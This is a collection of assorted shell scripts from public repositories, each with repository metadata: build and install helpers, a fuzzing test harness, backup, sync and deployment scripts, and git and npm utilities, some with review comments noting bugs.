# global IFS="/" -- the original's IFS change leaked out of the first
# iteration and broke the inner *.json glob for every following folder.
ticker=${folder##*/}
for json in "$folder"/*.json
do
echo "folder: $folder"
echo "ticker: $ticker"
echo "json:" "$json"
python json2mongodb.py "$json" "$ticker"
done
done
| true |
436bd49311d597758bc33b4b4dbabc362de82396 | Shell | feroult/yawp-dataflow-draft | /integration-tests/add_student.sh | UTF-8 | 260 | 2.640625 | 3 | [] | no_license | #!/bin/bash
# Usage: add_student.sh <student-id> <grade-id> <score>
STUDENT_ID=$1
GRADE_ID=$2
SCORE=$3
# API root; override with FLOWT_API, defaults to a local dev server.
BACKEND_API=${FLOWT_API:-http://localhost:8080/api}
# POST the student record; the trailing "echo" adds a newline after curl's
# output. NOTE(review): the payload uses relaxed JSON (unquoted keys) --
# confirm the backend accepts it.
curl -H "Content-type: application/json" -X POST -d "{ id: '/students/$STUDENT_ID', gradeId: '/grades/$GRADE_ID', score: $SCORE }" $BACKEND_API/students; echo
| true |
b720d8b9c99936354f59129de967d0e8a5eafa57 | Shell | saltyblu/tools | /workfow-docs | UTF-8 | 2,234 | 3.859375 | 4 | [] | no_license | #!/bin/bash
# Workflow file to document (a reusable GitHub Actions workflow YAML).
workflow_file=$1
# Emit a markdown table documenting the workflow_call inputs of
# $workflow_file, read with yq. Writes to stdout.
generate_inputs() {
echo "## inputs"
echo
echo "|name|description|default|required|type|"
echo "|-|-|-|-|:-|"
# yq prints the key list as a bracketed sequence; iterate its tokens.
for var_name in $(yq '.on.workflow_call.inputs | keys' < $workflow_file); do
# Skip the surrounding "[" / "]" tokens of yq's list output.
if [[ "$var_name" == '[' || "$var_name" == ']' ]]; then continue; fi
# Drop the trailing comma, then the quotes, for display.
var="${var_name/,/}"
var="${var//\"/}"
description=$(yq ".on.workflow_call.inputs[${var_name/,/}].description" < $workflow_file)
default=$(yq ".on.workflow_call.inputs[${var_name/,/}].default" < $workflow_file)
required=$(yq ".on.workflow_call.inputs[${var_name/,/}].required" < $workflow_file)
type=$(yq ".on.workflow_call.inputs[${var_name/,/}].type" < $workflow_file)
# Substitute documentation defaults for missing fields.
if [[ "${description}" == "null" ]]; then description="n/a"; fi
if [[ "${default}" == "null" ]]; then default="-"; fi
if [[ "${required}" == "null" ]]; then required="false"; fi
if [[ "${type}" == "null" ]]; then type="string"; fi
echo "| \`$var\` | $description | \`${default//\"/}\` | $required |$type|"
done
echo
}
# Emit a markdown table documenting the workflow_call secrets of
# $workflow_file (same yq token-parsing approach as generate_inputs).
generate_secrets() {
echo "## secrets"
echo
echo "|name|description|required|"
echo "|-|-|-|"
for var_name in $(yq '.on.workflow_call.secrets | keys' < $workflow_file); do
if [[ "$var_name" == '[' || "$var_name" == ']' ]]; then continue; fi
var="${var_name/,/}"
var="${var//\"/}"
description=$(yq ".on.workflow_call.secrets[${var_name/,/}].description" < $workflow_file)
required=$(yq ".on.workflow_call.secrets[${var_name/,/}].required" < $workflow_file)
if [[ "${description}" == "null" ]]; then description="n/a"; fi
if [[ "${required}" == "null" ]]; then required="false"; fi
echo "| \`$var\` | $description | $required |"
done
echo
}
# A workflow file argument is mandatory.
if [[ -z "$workflow_file" ]]; then
echo "no workflow_file given."
exit 1
fi
# Dispatch on the requested section: inputs, secrets, or (default) both.
main() {
  local section="${1}"
  if [[ "$section" == "inputs" || "$section" == "input" || "$section" == "i" ]]; then
    generate_inputs
  elif [[ "$section" == "secrets" || "$section" == "secret" || "$section" == "s" ]]; then
    generate_secrets
  else
    generate_inputs
    generate_secrets
  fi
}
# The second CLI argument selects the section; anything else emits both.
main "${2:-all}"
| true |
edebe2ba77fc40f39270f77eb317491f1c3d0e78 | Shell | Arondight/loader.sh | /examples/complex/example.sh | UTF-8 | 316 | 3.21875 | 3 | [
"MIT"
] | permissive | #!/usr/bin/env bash
# Resolve the script's real directory (following symlinks).
RDIR=$(dirname $(readlink -f "$0"))
LOADER="${RDIR}/loader/loader.sh"
LIBDIR="${RDIR}/libs"
# Basenames of every *.sh library under libs/, sorted.
LIBS=($(basename -a $(find "$LIBDIR" -type f -name '*.sh' | sort)))
# loader.sh provides load_path and load.
source "$LOADER"
load_path "$LIBDIR"
load "${LIBS[@]}"
{
echo "example.sh: here we load ${LIBS[@]}."
echo "example.sh: done."
}
| true |
e6026a040f88490223df38b27848eb8823e70000 | Shell | cesumilo/eth-keys-generator | /install-deps.sh | UTF-8 | 2,866 | 3.578125 | 4 | [] | no_license | # Author: Guillaume ROBIN <robinguillaume.pro@gmail.com>
# Date: 04/08/2017
# Abort with an error message when the given status code is non-zero.
# Arguments: $1 - status code ("0" means success)
#            $2 - message (may contain \n escapes, which are expanded)
check_error() {
  [ "$1" = "0" ] && return 0
  printf 'error(%s): %b\n' "$1" "$2" >&2
  exit 1
}
# Warn (and wait for confirmation) when not running on Ubuntu.
# Reads NAME= from /etc/os-release; any stdin line continues, CTRL-C aborts.
function check_os() {
gawk -F= '/^NAME/{print $2}' /etc/os-release | grep "Ubuntu"
if [ "$?" != "0" ]; then
# FIX: plain echo printed the "\n" literally; -e expands it so the warning
# really spans two lines, matching the \n-style messages used elsewhere
# in this script.
(>&2 echo -e "[WARNING] This script has been tested only on Ubuntu.\nPress ENTER to continue or CTRL-C to exit.")
read
fi
}
# Verify the build prerequisites are installed (via dpkg status lines),
# aborting with an apt-get hint through check_error otherwise.
function check_deps() {
dpkg-query -W -f='${Status}\n' build-essential | grep "^install ok"
check_error $? "build-essential package not installed.\nYou can use the following command line to solve this issue:\n\tsudo apt-get install build-essential"
dpkg-query -W -f='${Status}\n' texinfo | grep "^install ok"
check_error $? "texinfo package not installed.\nYou can use the following command line to solve this issue:\n\tsudo apt-get install texinfo"
dpkg-query -W -f='${Status}\n' openssl | grep "^install ok"
check_error $? "openssl package not installed.\nYou can use the following command line to solve this issue:\n\tsudo apt-get install openssl"
dpkg-query -W -f='${Status}\n' make | grep "^install ok"
# FIX: this message claimed "openssl package not installed" for the "make"
# check (copy-paste error); it now names the right package.
check_error $? "make package not installed.\nYou can use the following command line to solve this issue:\n\tsudo apt-get install make"
}
# Reset the local library staging area: drop any previous ./lib/include
# and ./lib/bin directories and recreate them empty.
clean_prev_installs() {
  local dir
  for dir in ./lib/include ./lib/bin; do
    if [ -d "$dir" ]; then
      rm -r "$dir"
    fi
    mkdir -p "$dir"
  done
}
# Build and install the vendored dependencies in order; each step aborts
# via check_error on failure. Uses cd paths relative to the previous dir.
function install_deps() {
echo "[*] Installing auto-auto-complete."
cd lib/auto-auto-complete
make
check_error $? "something went wrong during auto-auto-complete compilation."
# auto-auto-complete's binaries must be on PATH for the later builds.
export PATH=$PATH:$PWD/bin
echo "[*] Installing argparser."
cd ../argparser
make c
check_error $? "something went wrong during argparser compilation."
cp bin/argparser.so ../bin/libargparser.so
echo "[*] Installing libkeccak."
cd ../libkeccak
make
check_error $? "something went wrong during libkeccak compilation."
cp bin/lib* ../bin/
echo "[*] Installation sha3sum."
cd ../sha3sum
# NOTE(review): "LB_LIBRARY_PATH" looks like a typo for LD_LIBRARY_PATH --
# as written it is an inert variable for the make invocation.
CFLAGS="-isystem $PWD/../include" LB_LIBRARY_PATH=$PWD/../ make
check_error $? "something went wrong during sha3sum compilation."
# Consumed by the final "All done" message at the bottom of the script.
SHA3_SUM_PATH=$PATH:$PWD/bin
}
# "clean" mode: run make clean in every vendored dependency and exit.
if [ -n "$1" ] && [ "$1" = "clean" ]; then
cd lib/auto-auto-complete
make clean
cd ../argparser
make clean
cd ../libkeccak
make clean
cd ../sha3sum
make clean
exit 0
fi
# Default mode: verify the environment, then build everything.
echo "[*] Checking operating system."
check_os
echo "[*] Checking for dependencies."
check_deps
echo "[*] Cleaning previous installations."
clean_prev_installs
echo "[*] Installing dependencies."
install_deps
echo -e "[OK] All done.\nUse the following command line to complete the installation:\n\texport PATH=$SHA3_SUM_PATH"
| true |
e35ba1f11c6da4bcac17738cee8db1a9c0518943 | Shell | Silck-Apps/slickapps | /resources/Linux Scripts/archive/scripts_original_folder/ispconfig/data-replication/old/sites-available.sh | UTF-8 | 467 | 3.1875 | 3 | [] | no_license | dir="/etc/apache2/sites-available"
# Seconds to wait between sync rounds.
timeout=30
logfile="sites-available.log"
logdir="/var/log/ispconfig/unison/"
logpath=$logdir$logfile
servername="ispcfg"
# Last two characters of the hostname select this node's number.
# NOTE(review): the ( ... ) array assignment is unnecessary here; a plain
# scalar assignment would do.
servernumber=(${HOSTNAME: -2})
# Peer selection: node 01 syncs with 02 and vice versa.
case $servernumber in
"01")
server=$servername"02"
;;
"02")
server=$servername"01"
;;
*)
esac
# Endless loop: two-way sync $dir with the peer over ssh, overwriting the
# log each round, then sleep.
while [ 0 == 0 ]
do
unison -batch -auto -group -owner -terse $dir ssh://$server/$dir > $logpath
sleep $timeout
done
| true |
440e088dd0db326c16d2ce5cd3fd4acaea4bf8ae | Shell | shulifink/conjur-base-image | /phusion-ruby-builder/build.sh | UTF-8 | 552 | 3.015625 | 3 | [
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0"
] | permissive | #!/bin/bash
# Build the phusion-ruby-builder image when it cannot be pulled from the
# registry, or when forced via the first CLI argument.
cd "$(dirname "$0")"
PHUSION_VERSION=0.11
RUBY_MAJOR_VERSION=2.5
RUBY_FULL_VERSION=2.5.1
OPENSSL_BUILDER_TAG=1.0.2u-fips-2.0.16
docker pull registry.tld/phusion-ruby-builder:"$RUBY_FULL_VERSION-fips"
# "$1" is executed as a command and is expected to be "true" or "false".
# NOTE(review): calling the script with no argument makes "$1" fail as
# "command not found" -- pass true/false explicitly, or default it
# (e.g. "${1:-false}").
if [ $? -ne 0 ] || "$1"; then
docker build -t phusion-ruby-builder:"$RUBY_FULL_VERSION-fips" \
--build-arg PHUSION_VERSION="$PHUSION_VERSION" \
--build-arg RUBY_MAJOR_VERSION="$RUBY_MAJOR_VERSION" \
--build-arg RUBY_FULL_VERSION="$RUBY_FULL_VERSION" \
--build-arg OPENSSL_BUILDER_TAG="$OPENSSL_BUILDER_TAG" \
.
fi
| true |
978d4a9562e8291719465f7b5bfee56578287353 | Shell | apmarshall/dotfiles | /bin/nightly-build | UTF-8 | 548 | 3.40625 | 3 | [
"MIT"
] | permissive | #! bin/bash
# Pulls down changes for all our version controlled software from the latest builds.
# Set to 1 for more verbose output:
verbose=0
# Find git repos and loop over them:
for repo in $(find . -type d -name ".git"); do
# cd to the dir that contains .git/:
dir=${repo%/.git}
cd "${dir}" || continue
# Only touch repositories that track an "upstream" remote.
# FIX: the original "if ( ... ) do ... done" was not valid bash syntax, so
# this script failed to parse; rewritten as a proper if/then/fi.
if git remote -v | grep -q "upstream"; then
git checkout nightly
git fetch upstream
# TODO(review): "git list" is not a git subcommand -- probably "git log"
# (or "git shortlog") was intended for the review file.
git list >> "$HOME/Code/nightly-review.txt"
git merge upstream/master nightly
fi
# FIX: return to the search root, otherwise the relative paths produced
# by find would be wrong for every repository after the first.
cd - >/dev/null || exit 1
done
| true |
18d2ea80dca2bc659bcf25f1e5635cb339601d6a | Shell | raboserg/java-afl | /test-fuzz.sh | UTF-8 | 3,332 | 3.203125 | 3 | [
"Apache-2.0"
] | permissive | #!/usr/bin/env bash
#
# Copyright 2018 Jussi Judin
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Trace commands and fail fast (-x -e -u, and fail whole pipelines).
set -xeuo pipefail
# AFL environment knobs: skip the CPU governor check and disable the TUI.
export AFL_SKIP_CPUFREQ=1
export AFL_NO_UI=1
# Enable running in Travis CI without root access:
export AFL_NO_AFFINITY=1
export AFL_I_DONT_CARE_ABOUT_MISSING_CRASHES=1
# Wall-clock seconds each fuzzing run below is allowed before SIGINT.
test_timeout=10
# Per-testcase timeout string passed to java-afl-fuzz's -t option.
testcase_timeout=1000+
# Sanity-check one finished fuzzing run.
# Exits 1 when the queue holds fewer than 15 unique paths, or when the
# fuzzer_stats stability line reports anything other than 100.00%.
check_fuzz_status()
{
  local mode=$1
  local n_paths
  n_paths=$(find out/fuzz-"$mode"/queue -type f | grep -v .state | wc -l)
  [[ "$n_paths" -ge 15 ]] || {
    echo >&2 "$mode mode does not seem to provide unique paths!"
    exit 1
  }
  local unstable
  unstable=$(grep stability out/fuzz-"$mode"/fuzzer_stats | grep -v "100.00%" || :)
  [[ -z "${unstable:-}" ]] || {
    echo >&2 "$mode mode was unstable: $unstable"
    exit 1
  }
}
# Fuzz each instrumentation mode for $test_timeout seconds (timeout stops
# the fuzzer with SIGINT), then validate the run's results.
for mode in Forking Deferred Persistent; do
rm -rf out/fuzz-"$mode"
timeout --preserve-status -s INT "$test_timeout" \
./java-afl-fuzz -t "$testcase_timeout" -m 30000 -i in/ -o out/fuzz-"$mode" \
-- java -cp out/ins test."$mode"
check_fuzz_status "$mode"
# TODO persistent dynamic instrumentation is not 100% stable.
if [[ "$mode" == Persistent ]]; then
continue
fi
# Repeat with the dynamic (run-time) instrumentation entry point.
timeout --preserve-status -s INT "$test_timeout" \
./java-afl-fuzz -t "$testcase_timeout" -m 30000 -i in/ -o out/fuzz-"$mode" \
-- java -cp java-afl-run.jar:out javafl.run test."$mode"
check_fuzz_status "$mode"
done
# A target that never reads input must produce exactly one queue entry per
# seed file and nothing more.
rm -rf out/fuzz-Null
timeout --preserve-status -s INT "$test_timeout" \
./java-afl-fuzz -t "$testcase_timeout" -m 30000 -i in/ -o out/fuzz-Null \
-- java -cp out/ins test.Null
queue_files=$(find out/fuzz-Null/queue -name 'id:*' -type f | grep -v .state | wc -l)
in_files=$(find in/ -type f | wc -l)
if [[ "$queue_files" -ne "$in_files" ]]; then
echo >&2 "When input is not read, program should not create any outputs!"
exit 1
fi
# A deliberately crashing target must yield at least one crash entry
# (static instrumentation first, then dynamic).
rm -rf out/fuzz-Crashing
timeout --preserve-status -s INT "$test_timeout" \
./java-afl-fuzz -t "$testcase_timeout" -m 30000 -i in/ -o out/fuzz-Crashing \
-- java -cp out/ins test.Crashing
crash_files=$(find out/fuzz-Crashing/crashes -name 'id:*' -type f | grep -v .state | wc -l)
if [[ "$crash_files" -lt 1 ]]; then
echo >&2 "There definitely should be some crashes!"
exit 1
fi
rm -rf out/fuzz-Crashing
timeout --preserve-status -s INT "$test_timeout" \
./java-afl-fuzz -t "$testcase_timeout" -m 30000 -i in/ -o out/fuzz-Crashing \
-- java -cp java-afl-run.jar:out javafl.run test.Crashing
crash_files=$(find out/fuzz-Crashing/crashes -name 'id:*' -type f | grep -v .state | wc -l)
if [[ "$crash_files" -lt 1 ]]; then
echo >&2 "There definitely should be some dynamic crashes!"
exit 1
fi
| true |
dbbddd20d970056fb1de3a43547380b1483e363a | Shell | devonfw/ide | /scripts/src/test/bash/test-get-next-version | UTF-8 | 590 | 3.25 | 3 | [
"Apache-2.0"
] | permissive | #!/bin/bash
# Run from the resources dir so the relative source below resolves.
cd ../../../../scripts/src/main/resources || exit 1
# Overall exit status reported at the bottom of the script.
exitcode=0
# Provides doGetNextVersion.
source scripts/functions
echo "Testing getNextVersion"
# Check that doGetNextVersion maps ${1} to the expected ${2} and report.
# FIX: also flips the global exitcode to 1 on mismatch -- the script ends
# with 'exit "${exitcode}"' but nothing ever set it, so failing checks
# still produced a successful exit status.
function doTestGetNextVersion() {
  result=$(doGetNextVersion "${1}")
  status="OK"
  if [ "${result}" != "${2}" ]
  then
    status="NOK - was ${result}"
    exitcode=1
  fi
  echo "doGetNextVersion ${1} == ${2} ? ${status}"
}
# Expected behaviour: the trailing numeric run is incremented, preserving
# leading zeros and rolling 9 -> 10.
doTestGetNextVersion 3.0.0-beta8 3.0.0-beta9
doTestGetNextVersion 3.0.0-beta01 3.0.0-beta02
doTestGetNextVersion 3.0.0-beta9 3.0.0-beta10
doTestGetNextVersion 2020.04.01 2020.04.02
doTestGetNextVersion 2020.04.001 2020.04.002
exit "${exitcode}"
9c8062d5ada1eb9b821876cccb1ee062bb9b1d6b | Shell | delkyd/alfheim_linux-PKGBUILDS | /checkinstall/PKGBUILD | UTF-8 | 976 | 2.6875 | 3 | [] | no_license | # Maintainer: Nils Steinger (voidptr.de)
# Arch Linux PKGBUILD metadata for checkinstall (consumed by makepkg).
pkgname=checkinstall
pkgver=1.6.2
pkgrel=1
pkgdesc="Track files modified by an installation script and create a Slackware, RPM or Debian package"
arch=('i686' 'x86_64')
url="http://checkinstall.izto.org"
license=('GPL')
depends=('bash' 'glibc')
optdepends=('dpkg: to create deb packages')
makedepends=()
provides=('installwatch')
source=("http://checkinstall.izto.org/files/source/$pkgname-$pkgver.tar.gz"
"installwatch.patch"
"makefile.patch")
noextract=()
sha256sums=('dc61192cf7b8286d42c44abae6cf594ee52eafc08bfad0bea9d434b73dd593f4'
'91f99f594953c3fa1d4f6a41a7d3fa3b4a86c5187b325145336608ab49e10d32'
'46e60ae1c0b199051ac10e70dcad7dfc94508960e98885882b5d71a11fed7f0a')
# Apply the two local patches to the unpacked source tree.
prepare() {
cd "$pkgname-$pkgver"
patch -p1 -i "$srcdir/installwatch.patch"
patch -p1 -i "$srcdir/makefile.patch"
}
build() {
cd "$pkgname-$pkgver"
make
}
# Install into the staging dir makepkg provides via $pkgdir.
package() {
cd "$pkgname-$pkgver"
make PREFIX="$pkgdir/usr" install
}
| true |
52721ec8252deda57637432b0c6427e6bfab8fc5 | Shell | smart-coffee/device-api | /docker/docker-entrypoint.sh | UTF-8 | 688 | 2.765625 | 3 | [] | no_license | #!/bin/sh
# Container entrypoint: seed a default .env on first run, load the I2C
# kernel module, then start the application.
cd src
env_file=".env"
# Only generate the file when it does not exist, so a mounted/custom .env
# is preserved. NOTE(review): the unquoted EOF delimiter expands
# $local_mode (undefined here) to an empty string in the generated file.
if [ ! -e "$env_file" ]
then
cat <<EOF >$env_file
MODE=prod
# Should be empty in $local_mode environment
CERT_FILE=""
KEY_FILE=""
# Customize as needed
APP_HOST=0.0.0.0
APP_PORT=80
#############################
## Configured in balena.io ##
# SECRET_KEY= #
# APP_URL_PREFIX= #
#############################
# Should be empty in $local_mode environment
SWAGGER_BASE_URL=""
#############################
## Configured in balena.io ##
# WEBAPI_DOMAIN= #
# WEBAPI_PORT= #
#############################
SSL_CA_BUNDLE='/etc/ssl/certs/ca-certificates.crt'
EOF
fi
# Load the i2c-dev kernel module (presumably needed by the hardware layer).
modprobe i2c-dev
# -u: unbuffered output so container logs appear immediately.
python -u app.py
| true |
12c08f60d139a821b5dca4e99d3422972e1ae95f | Shell | askDing/bash_learning | /dialog_learn.sh | UTF-8 | 501 | 3.328125 | 3 | [] | no_license | #! /bin/bash
# The "dialog" utility must be installed for this script.
# Loop until the user enters the name "cosmos".
name=''
# FIX: the original condition was written as [ "$name" != "cosmos"] (no
# space before the closing bracket), so the test always errored out and
# the loop never ran.
while [ "$name" != "cosmos" ] ; do
# FIX: dialog writes the entered text to stderr (as the --menu below
# already assumes with "2> menu.txt"), so the redirection must be
# "2>name"; the original "2 >name" passed "2" as an argument and sent
# stdout -- the UI itself -- into the file.
dialog --inputbox "Please input username" 40 80 2>name
name=`cat name`
done
dialog --msgbox "Welcome to sutdent Information System" 10 20
while [ : ]
do
dialog --menu "Choose your operatin:" 10 80 3 1 "Add Student info" 2 Delete Student info 3 "Modify Student info" 4 exit 2> menu.txt
menu=`cat menu.txt`
dialog --msgbox "Your choose is $menu" 10 20
# Quote and compare as a string: a cancelled menu leaves $menu empty,
# which made the original unquoted numeric test error out.
if [ "$menu" = "4" ]; then
exit 0
fi
done
| true |
4db1cf95da570d0ae88f36470ccd1ce9e83b5630 | Shell | jasoncheng7115/it-scripts | /proxmoxve/bakpveconf.sh | UTF-8 | 179 | 2.71875 | 3 | [] | no_license | #!/bin/bash
# bakpveconf.sh
# Back up the Proxmox VE configuration (/etc/pve) into a timestamped
# tarball under the target directory given as the first argument.
hostname=$(hostname)
fn_date=$(date "+%Y%m%d.%H%M")
bak_targetpath=$1
/bin/tar -zcvf ${bak_targetpath}/pveconf_${hostname}_${fn_date}_.tar.gz /etc/pve
| true |
8daa0a18617ea56388c78b231a5808ae5ffdf4a3 | Shell | ToM-MaS/GPiBE | /hooks/03-gbe-hooks.sh.chroot | UTF-8 | 453 | 3.390625 | 3 | [
"BSD-3-Clause"
] | permissive | #!/bin/bash
#
# GemeinschaftPi
# Run hook scripts from GBE
#
# Copyright (c) 2013, Julian Pawlowski <jp@jps-networks.eu>
# See LICENSE.GPiBE file for details.
#
# Load the local system configuration if present.
# NOTE(review): despite saying FATAL, the || branch only prints -- the
# script continues (set -e is only enabled on the next line).
[ -e /etc/gemeinschaft/system.conf ] && source /etc/gemeinschaft/system.conf || echo "FATAL ERROR: Local configuration file in /etc/gemeinschaft/system.conf missing"
set -e
echo -e "GPiBE: Now running hook files from GBE upstream ..."
# Execute every upstream chroot hook in glob (lexical) order.
for FILE in /be/upstream/GBE/config.v3/hooks/*.sh.chroot; do
${FILE}
done
| true |
d37aef21becbe01166b00c49f4d9d8d66944247e | Shell | rislah/grpc-client-server | /ci/scripts/deploy.sh | UTF-8 | 1,931 | 3.796875 | 4 | [] | no_license | #!/bin/sh
# Blue/green deploy helper driven by CI environment variables.
set -eo pipefail
if [ -z "$APISERVER_ADDR" ]; then
echo "Missing APISERVER_ADDR"
exit 1
fi
if [ -z "$HELM_INSTALL" ]; then
echo "Missing HELM_INSTALL"
exit 1
fi
if [ -z "$CA" ]; then
echo "Missing CA"
exit 1
fi
if [ -z "$TOKEN" ]; then
echo "Missing TOKEN"
exit 1
fi
# Build a kubeconfig for the "drone" user from the base64 $TOKEN / $CA.
setup_kube() {
echo "$TOKEN" | base64 -d > token
echo "$CA" | base64 -d > ca.crt
kubectl config set-credentials drone --token="$(cat ./token)"
kubectl config set-cluster kubernetes --server="$APISERVER_ADDR" --certificate-authority=ca.crt
kubectl config set-context drone --cluster=kubernetes --user=drone --namespace=default
kubectl config use-context drone
chmod 755 ~/.kube/config
kubectl version
}
# Deploy $TAG to whichever color is currently staging; the colors are read
# back from the release's helm values.
staging() {
productionColor=$(helm get values --all "$HELM_INSTALL" | grep -Po "prod: \K.*" )
stagingColor=$(helm get values --all "$HELM_INSTALL" | grep -Po 'staging: \K.*')
# NOTE(review): the "\n" inside the first argument is printed literally by
# %s -- the newline escape probably belongs in the format string only.
printf "Staging: %s\\nProduction: %s" "$stagingColor\n" "$productionColor"
cd "$(git rev-parse --show-toplevel)/charts/$HELM_INSTALL"
helm upgrade --install $HELM_INSTALL . --reuse-values -f env.yaml --set "deployment.$stagingColor.enabled=true" --set "deployment.$stagingColor.client.image.tag=$TAG" --set "deployment.$stagingColor.server.image.tag=$TAG" "$ADDITIONAL_STAGING_ARGS"
}
# Swap the prod and staging colors (blue/green cut-over).
switch() {
productionColor=$(helm get values --all "$HELM_INSTALL" | grep -Po "prod: \K.*" )
stagingColor=$(helm get values --all "$HELM_INSTALL" | grep -Po 'staging: \K.*')
printf "Staging: %s\nProduction: %s" "$stagingColor\n" "$productionColor"
cd "$(git rev-parse --show-toplevel)/charts/$HELM_INSTALL"
helm upgrade --install $HELM_INSTALL . --reuse-values -f env.yaml --set "deployment.prod=$stagingColor" --set deployment.staging="$productionColor" "$ADDITIONAL_SWITCH_ARGS"
}
setup_kube
# Mode flags come from the CI environment: SWITCH and/or STAGING.
if [ -n "$SWITCH" ]; then
switch
fi
if [ -n "$STAGING" ]; then
staging
fi
| true |
ada1945bddbe8137f9cfa992cd267cc8e49c1e8b | Shell | nstoykov/c2cgeoportal | /ci/publish-documentation | UTF-8 | 427 | 3.28125 | 3 | [
"BSD-2-Clause-Views"
] | permissive | #!/bin/bash -ex
# Publish the built documentation onto the gh-pages branch, under a
# directory named after ${MAIN_BRANCH}.
# Current commit hash (second field of git log's "commit <hash>" line).
GIT_REV=$(git log | head --lines=1 | awk '{{print $2}}')
ci/extract-documentation /tmp/doc
git checkout gh-pages
# Replace any previously published copy for this branch.
if [ -e ${MAIN_BRANCH} ]
then
git rm -r --force -- ${MAIN_BRANCH}
fi
mv /tmp/doc/html ${MAIN_BRANCH}
git add --all ${MAIN_BRANCH}
# "|| true": an unchanged tree (nothing to commit) must not fail the job.
git commit --message="Update documentation for the revision ${GIT_REV}" || true
git push origin gh-pages
# Back to the original branch
git checkout ${GIT_REV}
| true |
e206b5082c629931dd821bf53c9a57b6314758b0 | Shell | jluccisano/GenerixTools | /deploy_bb_project.sh | UTF-8 | 1,364 | 2.796875 | 3 | [] | no_license | #!/bin/sh
# BlackBerry build/deploy paths.
gencore_mobile_home=/home/jluccisano/work/workspaces/workspace_BB/Gencore_mobile_bb
codename=$gencore_mobile_home/deliverables/Standard/6.0.0/Gencore_mobile_bb
# NOTE(review): the unquoted ";" splits this into an assignment followed by
# an attempt to execute the second path as a command -- quote the value if
# a ;-separated source-root list is intended.
sourceroot=$gencore_mobile_home/res;$gencore_mobile_home/src/main/java
import_api=/home/jluccisano/work/tools/blackberry/net.rim.ejde.componentpack6.0.0_6.0.0.29/components/lib/net_rim_api.jar
classpath=$gencore_mobile_home/bin
# NOTE(review): %var% is Windows batch syntax; in sh these are passed as
# literal text -- $codename etc. was probably intended.
rapc -quiet codename=%codename% %codename%.rapc -sourceroot=%sourceroot% -import=%import_api% %classpath%
bjavaloader -u load %gencore_mobile_home%\deliverables\Standard\6.0.0\Gencore_mobile_bb.cod
So, there is absolutely nothing special about running the cod compiler.
I have jmIrc running on my BB now.
here is the sequence of actions:
1. Compile normal midp-2.0 midlet with J2ME SDK from Sun
2. set up $WTK_HOME to point to your J2ME install, $RIM to point to
your JDE/MDS/classpath, and $APPNAME to your app name
4. cd to $WTK_HOME/apps/$APPNAME
3. run
PATH=$WTK_HOME/bin:$PATH \
java -jar $RIM/rapc.jar import=$RIM/net_rim_api.jar \
codename=$APPNAME -midlet jad=bin/$APPNAME.jad bin/$APPNAME.jar
Your .cod file will end up in current dir. bin/$APPNAME.jad will be modified to contain all
BB-specific info.
That's it folks!
P.S. Of course - running emulator and all other stuff will require more work,
but I personally don't care enough for now.
| true |
f3167773e759487b7e9593f4b5519fdc8f8e0147 | Shell | moki9/eRCaGuy_dotfiles | /useful_scripts/git-branch_.sh | UTF-8 | 2,181 | 3.859375 | 4 | [
"MIT"
] | permissive | #!/bin/bash
# This file is part of eRCaGuy_dotfiles: https://github.com/ElectricRCAircraftGuy/eRCaGuy_dotfiles
# DESCRIPTION:
#
# Same as `git branch` except don't show "hidden", user-backed-up branches.
#
# A special version of `git branch` which hides (doesn't show) any branches which begin with either
# PREFIX1 or PREFIX2 below and would normally show up when you run `git branch`.
#
# This is useful, for instance, so that you can prefix all backup branches with `z-bak` or `_`
# (examples: `z-bak-my_backup_branch_name` or `_my_backup_branch_name`), withOUT having them
# clutter your screen whenever you run `git branch_`. Simply run `git branch_` in place of `git
# branch` from now on.
#
# Since it's a simple wrapper around `git branch`, it takes any and all input parameters/options
# accepted by `git branch`!
#
# For details, see my Stack Overflow answer here: https://stackoverflow.com/a/66574807/4561887.
# INSTALLATION INSTRUCTIONS:
# 1. Create a symlink in ~/bin to this script so you can run it from anywhere as `git branch_` OR
# as `git-branch_` OR as `gs_git-branch_` OR as `git gs_branch_`. Note that "gs" is my initials.
# I do these versions with "gs_" in them so I can find all scripts I've written really easily
# by simply typing "gs_" + Tab + Tab, or "git gs_" + Tab + Tab.
# cd /path/to/here
# mkdir -p ~/bin
# ln -si "${PWD}/git-branch_.sh" ~/bin/git-branch_ # required
# ln -si "${PWD}/git-branch_.sh" ~/bin/git-gs_branch_ # optional; replace "gs" with your initials
# ln -si "${PWD}/git-branch_.sh" ~/bin/gs_git-branch_ # optional; replace "gs" with your initials
# 2. Now you can use this command directly anywhere you like in any of these 5 ways:
# 1. `git branch_` <=== my preferred way to use this program, so it feels just like `git branch`!
# 2. `git-branch_`
# 3. `git gs_branch_`
# 4. `git-gs_branch_`
# 3. `gs_git-branch_`
# Ignore (don't print with `git branch_`) branch names which begin with
# these prefix strings
PREFIX1="z-bak"
PREFIX2="_"
# Keep git's coloring on the branch list, then drop the hidden prefixes;
# the leading spaces in the pattern match git branch's indentation for
# non-current branches, so the current ("* ") branch is never hidden.
git branch --color=always "$@" \
| grep --color=never -v "^  $PREFIX1" \
| grep --color=never -v "^  $PREFIX2"
| true |
ee18abd5264e3417ffbdeb36f510ec7c1ae3fa51 | Shell | crzidea/local-bin | /npm-lazyinstall | UTF-8 | 696 | 3.328125 | 3 | [] | no_license | #!/usr/bin/env sh
# env: NPM_LAZYINSTALL_HOST
# Cache node_modules on a remote host keyed by package name: when the
# remote package.json matches the local one, pull the cached modules;
# otherwise run npm install and push the fresh cache back.
package_name=`node -p "require('./package.json').name"`
# Remote cache dir; the ~ is expanded by the remote shell, not locally.
dist_dir="~/.tmp/${package_name}"
dist="${NPM_LAZYINSTALL_HOST}:${dist_dir}"
ssh="ssh -o StrictHostKeyChecking=no"
$ssh $NPM_LAZYINSTALL_HOST "mkdir -p ${dist_dir}/"
rsync -az -e "$ssh" "${dist}/package.json" .previous-package.json
diff package.json .previous-package.json 2>/dev/null
# Cache hit: identical package.json and no forced REINSTALL.
if [[ $? -eq 0 && -z "$REINSTALL" ]]; then
rsync -az -e "$ssh" --delete "${dist}/node_modules" ./
echo modules are loaded from $dist/
else
npm install
rsync -az -e "$ssh" package.json "${dist}/package.json"
rsync -az -e "$ssh" --delete node_modules "${dist}/"
echo modules are saved at $dist/
fi
| true |
